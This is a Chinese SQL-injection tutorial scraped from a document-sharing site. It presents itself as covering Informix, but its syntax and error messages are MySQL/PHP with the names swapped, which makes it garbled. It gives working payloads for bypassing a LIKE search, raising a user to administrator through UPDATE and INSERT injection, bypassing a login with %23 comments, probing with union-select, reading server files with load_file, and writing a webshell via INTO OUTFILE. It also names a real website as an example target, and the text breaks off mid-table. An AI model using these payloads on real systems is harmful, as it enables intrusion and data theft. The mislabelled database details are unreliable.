Informix注入代码Word格式文档下载.docx

Informix注入代码Word格式文档下载.docx

《Informix注入代码Word格式文档下载.docx》由会员分享，可在线阅读，更多相关《Informix注入代码Word格式文档下载.docx（33页珍藏版）》请在冰豆网上搜索。

magic_quotes_gpc＝Off的注入方式还是大有市场的。

下面我们将从语法，注入点and注入类型几个方面来详细讲解Informix＋iis注入

A:

从INFORMIX语法方面先

1。

先讲一些Informix的基本语法，算是给没有好好学习的孩子补课了哦~_~

1）select

SELECT[STRAIGHT_JOIN][SQL_SMALL_RESULT]

select_expression,...

[INTO{OUTFILE|DUMPFILE}'

file_name'

export_options]

[FROMtable_references

[WHEREwhere_definition]

[GROUPBYcol_name,...]

[ORDERBY{unsigned_integer|col_name|formula}[ASC|DESC],...]

]

常用的就是这些，select_expression指想要检索的列，后面我们可以用where来限制条件，我们也可以用intooutfile将select结果输出到文件中。

当然我们也可以用select直接输出

例如

Informix>

select'

a'

;

+---+

|a|

1rowinset（0.00sec）

具体内容请看Informix中文手册7.12节

下面说一些利用啦

看代码先

这段代码是用来搜索的哦

<

formmethod=“POST”action=“<

?

echo$IIS_SELF;

?

>

“>

inputtype=“text”name=“search”>

br>

inputtype=“submit”value=“Search”>

/form>

iis

………

SELECT*FROMusersWHEREusernameLIKE‘%$search%’ORDERBYusername

…….

这里我们顺便说一下Informix中的通配符，’%’就是通配符，其它的通配符还有’*’和’_’,其中"

*"

用来匹配字段名，而"

%"

用来匹配字段值，注意的是%必须与like一起适用，还有一个通配符，就是下划线"

_"

，它代表的意思和上面不同，是用来匹配任何单个的字符的。

在上面的代码中我们用到了’*’表示返回的所有字段名，%$search%表示所有包含$search字符的内容。

我们如何注入哩？

哈哈，和asp里很相似

在表单里提交

Aabb%’or1=1orderbyid#

注：

#在Informix中表示注释的意思，即让后面的sql语句不执行，后面将讲到。

或许有人会问为什么要用or1＝1呢，看下面，

把提交的内容带入到sql语句中成为

SELECT*FROMusersWHEREusernameLIKE‘%aabb%’or1=1orderbyid#ORDERBYusername

假如没有含有aabb的用户名，那么or1＝1使返回值仍为真，使能返回所有值

我们还可以这样

%’orderbyid#

或者

’orderbyid#

带入sql语句中成了

SELECT*FROMusersWHEREusernameLIKE‘%%’orderbyid#ORDERBYusername

和

SELECT*FROMusersWHEREusernameLIKE‘%%’orderbyid#ORDERBYusername

当然了，内容全部返回。

列出所有用户了哟，没准连密码都出来哩。

这里就举个例子先，下面会有更精妙的select语句出现，select实际上几乎是无处不在的哦！

2）下面看update咯

Informix中文手册里这么解释的：

UPDATE[LOW_PRIORITY]tbl_nameSETcol_name1=expr1,col_name2=expr2,...

UPDATE用新值更新现存表中行的列，SET子句指出哪个列要修改和他们应该被给定的值，WHERE子句，如果给出，指定哪个行应该被更新，否则所有行被更新。

详细内容去看Informix中文手册7.17节啦，在这里详细介绍的话会很罗嗦的哦。

由上可知update主要用于数据的更新，例如文章的修改，用户资料的修改，我们似乎更关心后者，因为......

看代码先哦

我们先给出表的结构，这样大家看的明白

CREATETABLEusers（

idint（10）NOTNULLauto_increment,

loginvarchar（25）,

passwordvarchar（25）,

emailvarchar（30）,

userleveltinyint,

PRIMARYKEY（id）

）

其中userlevel表示等级，1为管理员，2为普通用户

//change.iis

……

$sql="

UPDATEusersSETpassword='

$pass'

email='

$email'

WHEREid='

$id'

"

Ok，我们开始注入了哦，在添email的地方我们添入

netsh@’,userlevel=’1

sql语句执行的就是

youpass'

email='

netsh@’,userlevel=’1’WHEREid='

youid’

看看我们的userlevel就是1了，变成管理员了哟

哈哈，如此之爽，简直是居家旅行必备啊。

这里我们简单提一下单引号闭合的问题，如果只用了一个单引号而没有单引号与之组成一对，系统会返回错误。

列类型主要分为数字类型，日期和时间类型，字符串类型，然而引号一般用在字符串类型里，而在数字类型里一般人都不会用到引号（然而却是可以用的，而且威力很大），日期和时间类型就很少用于注入了（因为很少有提交时间变量的）。

在下面我们会详细将这几种类型的注入方式哦！

3）下面轮到insert了，它已经等的不耐烦了，简直就像中午食堂里的学生们。

Iis中文手册是这样教我们的：

INSERT[LOW_PRIORITY|DELAYED][IGNORE]

[INTO]tbl_name[（col_name,...）]

VALUES（expression,...）,（...）,...

INSERT把新行插入到一个存在的表中，INSERT...VALUES形式的语句基于明确指定的值插入行，INSERT...SELECT形式插入从其他表选择的行，有多个值表的INSERT...VALUES的形式在Informix3.22.5或以后版本中支持，col_name=expression语法在Informix3.22.10或以后版本中支持。

由此可见对于见不到后台的我们来说，insert主要就出现在注册的地方，或者有其它提交的地方地方也可以哦。

看看表的结构先

CREATETABLEmembres（

idvarchar（15）NOTNULLdefault'

'

我们仍然假设userlevel表示用户等级，1为管理者，2为普通用户哈。

代码如下

//reg.iis

$query="

INSERTINTOmembersVALUES（'

'

$login'

’2'

）"

;

默认插入用户等级是2

现在我们构建注入语句了哦

还是在要我们输入email的地方输入：

netsh@’,’1’）#

sql语句执行时变成了：

INSERTINTOmembresVALUES（'

youid'

youname'

netsh@’,’1’）#'

?

看我们一注册就是管理员了。

#号表示什么来着，不是忘了吧，晕了，这么快？

忘就忘了吧，下面再详细给你说说

2.下面说一说Informix中的注释，这个是很重要的，大家可不能再睡觉啦，要是再睡觉到期末考试的时候就挂了你们。

我们继续

相信大家在上面的几个例子中已经看到注释的强大作用了吧，这里我们将再详细介绍一下。

Informix有3种注释句法

#注射掉注释符后面的本行内容

--注射效果同#

/*...*/注释掉符号中间的部分

对于#号将是我们最常用的注释方法。

--号记得后面还得有一个空格才能起注释作用。

/*…*/我们一般只用前面的/*就够了，因为后面的我们想加也不行，是吧？

注意：

在浏览器地址栏输入#时应把它写成%23，这样经urlencode转换后才能成为#，从而起到注释的作用。

#号在浏览器的地址框中输入的话可什么也不是哦。

为了大家深刻理解

这里我给大家来个例题

有如下的管理员信息表

CREATETABLEalphaauthor（

Idtinyint（4）NOTNULLauto_increment,

UserNamevarchar（50）NOTNULLdefault'

PASSWORDvarchar（50）defaultNULL,

Namevarchar（50）defaultNULL,

PRIMARYKEY（Id）,

UNIQUEKEYId（Id）,

KEYId_2（Id）

//Login.iis

$query="

select*fromalphaauthorwhereUserName='

$username'

andPassword='

$passwd'

$result=Informix_query（$query）;

$data=Informix_fetch_array（$result）;

if（$data）

{

Echo“重要信息”;

}

Else

Echo“登陆失败”;

我们以爱喜千团为例，这是一个换物网（也称呼换客网、以物换物、易物网）在浏览器地址框直接输入

id=1%23

%23转换成#了

放到sql语句中

a’orid=1#'

#号后面的都拜输入了，看看

这句话等价于

a’orid=1

再仔细看看表的结构，只要有id=1的账户，返回的$data就应该为真

我们就直接登陆了，当然你也可以写

hppt:

//1＝1%23

一样的啦

3.下面将要出场的是……

对了，就是这些显示系统信息的间谍们

VERSION（）返回数据库版本信息

DATABASE（）返回当前的数据库名字，如果没有当前的数据库，DATABASE（）返回空字符串。

USER（）

SYSTEM_USER（）

SESSION_USER（）

返回当前Informix用户名

selectuser（）,database（）,version（）;

+----------------+------------+----------------+

|user（）|database（）|version（）|

|root@localhost|alpha|5.0.0-alpha-nt|

1rowinset（0.01sec）

如图

（1）所示,图不是很爽是不是？

睁大你的大眼睛好好看哦

有时候很有用的哦，比如说你可以根据他的Informix版本看看他的Informix有没有什么溢出漏洞，没准我们就发现个好动东哈哈

4.下面进入最重要的部分了，没睡觉的打起精神来，睡着了的醒一醒啦。

1）selectunionselect

还是iis中文手册中讲的：

SELECT...UNION[ALL]SELECT...[UNIONSELECT...]

UNION在Informix4.0.0中被实现。

UNION用于将多个SELECT语句的结果联合到一个结果集中。

在SELECT中的select_expression部分列出的列必须具有同样的类型。

第一个SELECT查询中使用的列名将作为结果集的列名返回。

SELECT命令是一个普通的选择命令，但是有下列的限制：

只有最后一个SELECT命令可以有INTOOUTFILE。

需要注意的是union前后的select字段数相同，只有这样union函数才能发挥作用。

如果字段数不等将返回

ERROR1222（21000）:

TheusedSELECTstatementshaveadifferentnumberofcolumns错误

晕咯，这样不好吧。

咋半哩？

别急哈，急也没用的

例如：

已知alphadb表有11列

我们

select*fromalphadbwhereid=351unionselect1,2,3,4,5,6,7,8,9,10fromalphaauthor;

如图

（2）

我们只slect了10个数当然出错啦。

下面看

select*fromalphadbwhereid=347unionselect1,2,3,4,5,6,7,8,9,10,11fromalphaauthor;

如图（3）

我们看看id＝247中的数据先

select*fromalphadbwhereid=347;

+-----+--------------------------------------------+-----------------

|id|title|content|importtime|author|accessing|addInto|type|showup|change_ubb|change_html|

|347|利用adsutil.vbs+..--发表于黑客档案2004.6期|发表于黑客x档案第6期|2004

-03-2811:

50:

50|Alpha|17|Alpha|2|1|1|1|

我们看到，它的返回结果和

是相同的。

哦，大家或许会问，这样有什么用呢？

问的好。

Ok，继续试验

当我们输入一个不存在的id的时候

例如id=0，或者id=347and1<

1

再看看

select*fromalphadbwhereid=347and1<

1unionselect1,2,3,4,5,6,7,8,9,10,11fromalphaauthor;

如图（4）

我们发现它把我们后面的1,2,3,4,5,6,7,8,9,10,11赋给了各个字段来显示。

哈哈，终于显示不一样了，可是这有什么用呢？

先不告诉你。

我们讲一个具体的例子先

http:

//localhost/site/display.iis?

id=347

看看图5

id=347and1<

1unionselect1,2,3,4,5,6,7,8,9,10,11fromalphaauthor

结果如图6

下面我们用一幅图来总结一下union的用法如图7

Ok，知道怎么利用了不？

不知道的话下面将会详细告诉你。

2）LOAD_FILE

这个功能太强大了，这也是林.linx在上一个专题中提到的方法。

虽然说过了，可我也不得不再提出来。

Load_file可以返回文件的内容，记得写全文件的路径和文件名称

Etc.

我们在Informix的命令行下输入

selectload_file（'

c:

/boot.ini'

）;

效果如图（8）

可是我们在网页中怎么搞呢？

我们可以结合unionselect使用

id=347%20and%201<

1%20union%20select%201,2,load_file（'

/apache/htdocs/site/lib/sql.inc'

）,4,5,6,7,8,9,10,11

这里的c:

/apache/htdocs/site/lib/sql.inc并不是我的配置文件哦，：

P

看仔细图9中的

看看，文件内容暴露无疑。

我们为什么要把load_file（'

）放在3字段呢？

我们前面提到列类型一共有那么三种，而原来图7中显示3的地方应该是显示文章内容，应该是字符型的，而load_file（'

）也一定是字符型的，所以我们猜测放在3字段可以顺利显示。

其实还有很多好的利用方法，继续往下看哦！

3）select*fromtableintooutfile'

file.txt'

有啥用哩？

作用就是把表的内容写入文件，知道有多重要了吧，我们写个webshell吧，哈哈。

当然我们不只是导出表，我们还可以导出其它东西的哦，往下看啦。

假设有如下表

#

#数据表的结构`test`

CREATETABLEtest